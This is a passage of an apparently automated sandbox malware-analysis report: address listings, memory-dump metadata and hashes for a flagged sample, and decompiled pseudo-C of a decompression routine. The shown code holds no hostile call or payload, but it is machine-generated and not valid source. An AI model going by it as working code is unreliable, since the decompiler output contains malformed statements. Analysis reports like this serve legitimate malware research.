                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x00000000
                                                              0x004073c8
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00000000
                                                              0x0040753b
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x00000000
                                                              0x00407390
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                              • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                              • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                              • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00406BB0(void* __ecx) {
                                                              				void* _v8;
                                                              				void* _v12;
                                                              				signed int _v16;
                                                              				unsigned int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				signed int _v40;
                                                              				signed int _v44;
                                                              				signed int _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				signed int _v64;
                                                              				signed int _v68;
                                                              				signed int _v72;
                                                              				signed int _v76;
                                                              				signed int _v80;
                                                              				signed int _v84;
                                                              				signed int _v88;
                                                              				signed int _v92;
                                                              				signed int _v95;
                                                              				signed int _v96;
                                                              				signed int _v100;
                                                              				signed int _v104;
                                                              				signed int _v108;
                                                              				signed int _v112;
                                                              				signed int _v116;
                                                              				signed int _v120;
                                                              				intOrPtr _v124;
                                                              				signed int _v128;
                                                              				signed int _v132;
                                                              				signed int _v136;
                                                              				void _v140;
                                                              				void* _v148;
                                                              				signed int _t537;
                                                              				signed int _t538;
                                                              				signed int _t572;
                                                              
                                                              				_t572 = 0x22;
                                                              				_v148 = __ecx;
                                                              				memcpy( &_v140, __ecx, _t572 << 2);
                                                              				if(_v52 == 0xffffffff) {
                                                              					return 1;
                                                              				}
                                                              				while(1) {
                                                              					L3:
                                                              					_t537 = _v140;
                                                              					if(_t537 > 0x1c) {
                                                              						break;
                                                              					}
                                                              					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                              						case 0:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								goto L173;
                                                              							}
                                                              							_v112 = _v112 - 1;
                                                              							_v116 = _v116 + 1;
                                                              							_t537 =  *_v116;
                                                              							__eflags = _t537 - 0xe1;
                                                              							if(_t537 > 0xe1) {
                                                              								goto L174;
                                                              							}
                                                              							_t542 = _t537 & 0x000000ff;
                                                              							_push(0x2d);
                                                              							asm("cdq");
                                                              							_pop(_t576);
                                                              							_push(9);
                                                              							_pop(_t577);
                                                              							_t622 = _t542 / _t576;
                                                              							_t544 = _t542 % _t576 & 0x000000ff;
                                                              							asm("cdq");
                                                              							_t617 = _t544 % _t577 & 0x000000ff;
                                                              							_v64 = _t617;
                                                              							_v32 = (1 << _t622) - 1;
                                                              							_v28 = (1 << _t544 / _t577) - 1;
                                                              							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                              							__eflags = 0x600 - _v124;
                                                              							if(0x600 == _v124) {
                                                              								L12:
                                                              								__eflags = _t625;
                                                              								if(_t625 == 0) {
                                                              									L14:
                                                              									_v76 = _v76 & 0x00000000;
                                                              									_v68 = _v68 & 0x00000000;
                                                              									goto L17;
                                                              								} else {
                                                              									goto L13;
                                                              								}
                                                              								do {
                                                              									L13:
                                                              									_t625 = _t625 - 1;
                                                              									__eflags = _t625;
                                                              									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                              								} while (_t625 != 0);
                                                              								goto L14;
                                                              							}
                                                              							__eflags = _v8;
                                                              							if(_v8 != 0) {
                                                              								GlobalFree(_v8);
                                                              							}
                                                              							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                              							__eflags = _t537;
                                                              							_v8 = _t537;
                                                              							if(_t537 == 0) {
                                                              								goto L174;
                                                              							} else {
                                                              								_v124 = 0x600;
                                                              								goto L12;
                                                              							}
                                                              						case 1:
                                                              							L15:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 1;
                                                              								goto L173;
                                                              							}
                                                              							_v112 = _v112 - 1;
                                                              							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                              							_v116 = _v116 + 1;
                                                              							_t50 =  &_v76;
                                                              							 *_t50 = _v76 + 1;
                                                              							__eflags =  *_t50;
                                                              							L17:
                                                              							__eflags = _v76 - 4;
                                                              							if(_v76 < 4) {
                                                              								goto L15;
                                                              							}
                                                              							_t550 = _v68;
                                                              							__eflags = _t550 - _v120;
                                                              							if(_t550 == _v120) {
                                                              								L22:
                                                              								_v76 = 5;
                                                              								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                              								goto L25;
                                                              							}
                                                              							__eflags = _v12;
                                                              							_v120 = _t550;
                                                              							if(_v12 != 0) {
                                                              								GlobalFree(_v12);
                                                              							}
                                                              							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                              							__eflags = _t537;
                                                              							_v12 = _t537;
                                                              							if(_t537 == 0) {
                                                              								goto L174;
                                                              							} else {
                                                              								goto L22;
                                                              							}
                                                              						case 2:
                                                              							L26:
                                                              							_t557 = _v100 & _v32;
                                                              							_v136 = 6;
                                                              							_v80 = _t557;
                                                              							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                              							goto L135;
                                                              						case 3:
                                                              							L23:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 3;
                                                              								goto L173;
                                                              							}
                                                              							_v112 = _v112 - 1;
                                                              							_t72 =  &_v116;
                                                              							 *_t72 = _v116 + 1;
                                                              							__eflags =  *_t72;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							L25:
                                                              							_v76 = _v76 - 1;
                                                              							__eflags = _v76;
                                                              							if(_v76 != 0) {
                                                              								goto L23;
                                                              							}
                                                              							goto L26;
                                                              						case 4:
                                                              							L136:
                                                              							_t559 =  *_t626;
                                                              							_t610 = _t559 & 0x0000ffff;
                                                              							_t591 = (_v20 >> 0xb) * _t610;
                                                              							__eflags = _v16 - _t591;
                                                              							if(_v16 >= _t591) {
                                                              								_v20 = _v20 - _t591;
                                                              								_v16 = _v16 - _t591;
                                                              								_v68 = 1;
                                                              								_t560 = _t559 - (_t559 >> 5);
                                                              								__eflags = _t560;
                                                              								 *_t626 = _t560;
                                                              							} else {
                                                              								_v20 = _t591;
                                                              								_v68 = _v68 & 0x00000000;
                                                              								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                              							}
                                                              							__eflags = _v20 - 0x1000000;
                                                              							if(_v20 >= 0x1000000) {
                                                              								goto L142;
                                                              							} else {
                                                              								goto L140;
                                                              							}
                                                              						case 5:
                                                              							L140:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 5;
                                                              								goto L173;
                                                              							}
                                                              							_v20 = _v20 << 8;
                                                              							_v112 = _v112 - 1;
                                                              							_t464 =  &_v116;
                                                              							 *_t464 = _v116 + 1;
                                                              							__eflags =  *_t464;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							L142:
                                                              							_t561 = _v136;
                                                              							goto L143;
                                                              						case 6:
                                                              							__edx = 0;
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								__eax = _v8;
                                                              								__ecx = _v60;
                                                              								_v56 = 1;
                                                              								_v136 = 7;
                                                              								__esi = _v8 + 0x180 + _v60 * 2;
                                                              								goto L135;
                                                              							}
                                                              							__eax = _v96 & 0x000000ff;
                                                              							__esi = _v100;
                                                              							__cl = 8;
                                                              							__cl = 8 - _v64;
                                                              							__esi = _v100 & _v28;
                                                              							__eax = (_v96 & 0x000000ff) >> 8;
                                                              							__ecx = _v64;
                                                              							__esi = (_v100 & _v28) << 8;
                                                              							__ecx = _v8;
                                                              							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                              							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                              							__eflags = _v60 - 4;
                                                              							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                              							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                              							if(_v60 >= 4) {
                                                              								__eflags = _v60 - 0xa;
                                                              								if(_v60 >= 0xa) {
                                                              									_t103 =  &_v60;
                                                              									 *_t103 = _v60 - 6;
                                                              									__eflags =  *_t103;
                                                              								} else {
                                                              									_v60 = _v60 - 3;
                                                              								}
                                                              							} else {
                                                              								_v60 = 0;
                                                              							}
                                                              							__eflags = _v56 - __edx;
                                                              							if(_v56 == __edx) {
                                                              								__ebx = 0;
                                                              								__ebx = 1;
                                                              								goto L63;
                                                              							}
                                                              							__eax = _v24;
                                                              							__eax = _v24 - _v48;
                                                              							__eflags = __eax - _v120;
                                                              							if(__eax >= _v120) {
                                                              								__eax = __eax + _v120;
                                                              								__eflags = __eax;
                                                              							}
                                                              							__ecx = _v12;
                                                              							__ebx = 0;
                                                              							__ebx = 1;
                                                              							__al =  *((intOrPtr*)(__eax + __ecx));
                                                              							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                              							goto L43;
                                                              						case 7:
                                                              							__eflags = _v68 - 1;
                                                              							if(_v68 != 1) {
                                                              								__eax = _v40;
                                                              								_v132 = 0x16;
                                                              								_v36 = _v40;
                                                              								__eax = _v44;
                                                              								_v40 = _v44;
                                                              								__eax = _v48;
                                                              								_v44 = _v48;
                                                              								__eax = 0;
                                                              								__eflags = _v60 - 7;
                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              								__al = __al & 0x000000fd;
                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                              								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                              								__eax = _v8;
                                                              								__eax = _v8 + 0x664;
                                                              								__eflags = __eax;
                                                              								_v92 = __eax;
                                                              								goto L71;
                                                              							}
                                                              							__eax = _v8;
                                                              							__ecx = _v60;
                                                              							_v136 = 8;
                                                              							__esi = _v8 + 0x198 + _v60 * 2;
                                                              							goto L135;
                                                              						case 8:
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								__eax = _v8;
                                                              								__ecx = _v60;
                                                              								_v136 = 0xa;
                                                              								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                              							} else {
                                                              								__eax = _v60;
                                                              								__ecx = _v8;
                                                              								__eax = _v60 + 0xf;
                                                              								_v136 = 9;
                                                              								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                              								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                              							}
                                                              							goto L135;
                                                              						case 9:
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								goto L92;
                                                              							}
                                                              							__eflags = _v100;
                                                              							if(_v100 == 0) {
                                                              								goto L174;
                                                              							}
                                                              							__eax = 0;
                                                              							__eflags = _v60 - 7;
                                                              							_t264 = _v60 - 7 >= 0;
                                                              							__eflags = _t264;
                                                              							0 | _t264 = _t264 + _t264 + 9;
                                                              							_v60 = _t264 + _t264 + 9;
                                                              							goto L78;
                                                              						case 0xa:
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								__eax = _v8;
                                                              								__ecx = _v60;
                                                              								_v136 = 0xb;
                                                              								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                              								goto L135;
                                                              							}
                                                              							__eax = _v44;
                                                              							goto L91;
                                                              						case 0xb:
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								__ecx = _v40;
                                                              								__eax = _v36;
                                                              								_v36 = _v40;
                                                              							} else {
                                                              								__eax = _v40;
                                                              							}
                                                              							__ecx = _v44;
                                                              							_v40 = _v44;
                                                              							L91:
                                                              							__ecx = _v48;
                                                              							_v48 = __eax;
                                                              							_v44 = _v48;
                                                              							L92:
                                                              							__eax = _v8;
                                                              							_v132 = 0x15;
                                                              							__eax = _v8 + 0xa68;
                                                              							_v92 = _v8 + 0xa68;
                                                              							goto L71;
                                                              						case 0xc:
                                                              							L102:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 0xc;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v116;
                                                              							__eax = _v16;
                                                              							_v20 = _v20 << 8;
                                                              							__ecx =  *_v116 & 0x000000ff;
                                                              							_v112 = _v112 - 1;
                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							_t340 =  &_v116;
                                                              							 *_t340 = _v116 + 1;
                                                              							__eflags =  *_t340;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							__eax = _v48;
                                                              							goto L104;
                                                              						case 0xd:
                                                              							L39:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 0xd;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v116;
                                                              							__eax = _v16;
                                                              							_v20 = _v20 << 8;
                                                              							__ecx =  *_v116 & 0x000000ff;
                                                              							_v112 = _v112 - 1;
                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							_t127 =  &_v116;
                                                              							 *_t127 = _v116 + 1;
                                                              							__eflags =  *_t127;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							L41:
                                                              							__eax = _v68;
                                                              							__eflags = _v76 - _v68;
                                                              							if(_v76 != _v68) {
                                                              								goto L50;
                                                              							}
                                                              							__eflags = __ebx - 0x100;
                                                              							if(__ebx >= 0x100) {
                                                              								goto L56;
                                                              							}
                                                              							L43:
                                                              							__eax = _v95 & 0x000000ff;
                                                              							_v95 = _v95 << 1;
                                                              							__ecx = _v92;
                                                              							__eax = (_v95 & 0x000000ff) >> 7;
                                                              							_v76 = __eax;
                                                              							__eax = __eax + 1;
                                                              							__eax = __eax << 8;
                                                              							__eax = __eax + __ebx;
                                                              							__esi = _v92 + __eax * 2;
                                                              							_v20 = _v20 >> 0xb;
                                                              							__ax =  *__esi;
                                                              							_v88 = __esi;
                                                              							__edx = __ax & 0x0000ffff;
                                                              							__ecx = (_v20 >> 0xb) * __edx;
                                                              							__eflags = _v16 - __ecx;
